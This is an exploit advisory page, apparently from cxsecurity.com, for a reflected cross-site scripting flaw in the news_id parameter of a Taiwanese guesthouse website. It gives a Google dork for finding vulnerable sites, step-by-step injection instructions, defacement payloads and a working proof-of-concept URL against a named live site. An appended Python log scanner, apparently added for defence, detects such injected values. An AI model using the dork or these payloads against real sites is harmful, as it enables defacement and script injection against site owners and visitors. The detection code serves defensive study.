花蓮民宿王 │ 洄瀾網 Cross Site Scripting Vulnerability

2015.12.29
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

########################################################
# Exploit Title: 花蓮民宿王 │ 洄瀾網 Cross Site Scripting Vulnerability
########################################################
# Google Dork: intext:"花蓮民宿王 │ 洄瀾網" inurl:index.php?news_id=
# Date: [28/12/2015]
# Exploit Author: Gray Hat Group=>MR.BL4CK
# Vendor Homepage: [http://www.17357.com.tw/]
# Software Link: [-]
# Version: All versions
# Tested on: [Win 8.1/Google Chrome]
# CVE: [-]
########################################################
# Description: Hello guys. First, enter the dork in Google and open the target.
# Then, to test for this vulnerability, you must test scripts after the ID number.
# For example, these scripts:
# 1-[<script>alert('XSS')</script>]
# 2-["><marquee><h1>Hacked_By_MR.BL4CK_forum.gray-hg.ir</h1></marquee>]
# 3-[<marquee%20behavior="alternate">Hacked_By_MR.BL4CK<b>]
# PoC:
# http://www.chenfa8533996.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# Good luck
########################################################
# Demo:
########################################################
# Thanks to: Bl4ck W4rning | Dalghak | MR.BL4CK | WHITE | H!dden V!rus | Shayan 72 | Keian | Ahriman | MR.ROBOT
# We Are Gray Hat Hackers
# Discovered By: MR.BL4CK
########################################################
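The advisory places the markup in `news_id`, which it describes as an ID number, so any request carrying a non-numeric `news_id` is worth flagging and is also what server-side validation should reject. The following is an added example, not part of the original advisory: a log scanner that assumes Apache/nginx combined-format access logs and purely numeric IDs, run here over constructed sample entries.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: Apache/nginx "combined" access log format.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r"[<>\"']")      # characters that can break out of HTML context
NUMERIC_RE = re.compile(r"[0-9]+")      # assumption: legitimate IDs are plain integers

# Constructed sample entries (documentation-range IPs), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Dec/2015:10:01:02 +0800] "GET /new/index.php?news_id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [28/Dec/2015:10:01:05 +0800] "GET /new/index.php?news_id=%22%3E%3Cmarquee%3Etest%3C/marquee%3E HTTP/1.1" 200 5301 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [28/Dec/2015:10:01:09 +0800] "GET /new/index.php?pageNum_RecdigiBoard=0&totalRows_RecdigiBoard=1&news_id=%253Cb%253E HTTP/1.1" 200 5301 "-" "Mozilla/5.0"',
    '203.0.113.4 - - [28/Dec/2015:10:02:00 +0800] "GET /new/index.php?news_id=abc HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def classify_news_id(value):
    """Return 'ok', 'markup' or 'non_numeric' for a decoded news_id value."""
    if MARKUP_RE.search(value):
        return "markup"
    return "ok" if NUMERIC_RE.fullmatch(value) else "non_numeric"


def scan(lines):
    """Return (line_number, verdict, decoded_value) for each suspicious news_id."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes once; keep blanks so "news_id=" is seen too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name != "news_id":
                continue
            decoded = unquote(value)  # second pass catches double encoding (%253C)
            verdict = classify_news_id(decoded)
            if verdict != "ok":
                findings.append((number, verdict, decoded))
    return findings


if __name__ == "__main__":
    for number, verdict, value in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}: {value!r}")
```
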



Copyright 2024, cxsecurity.com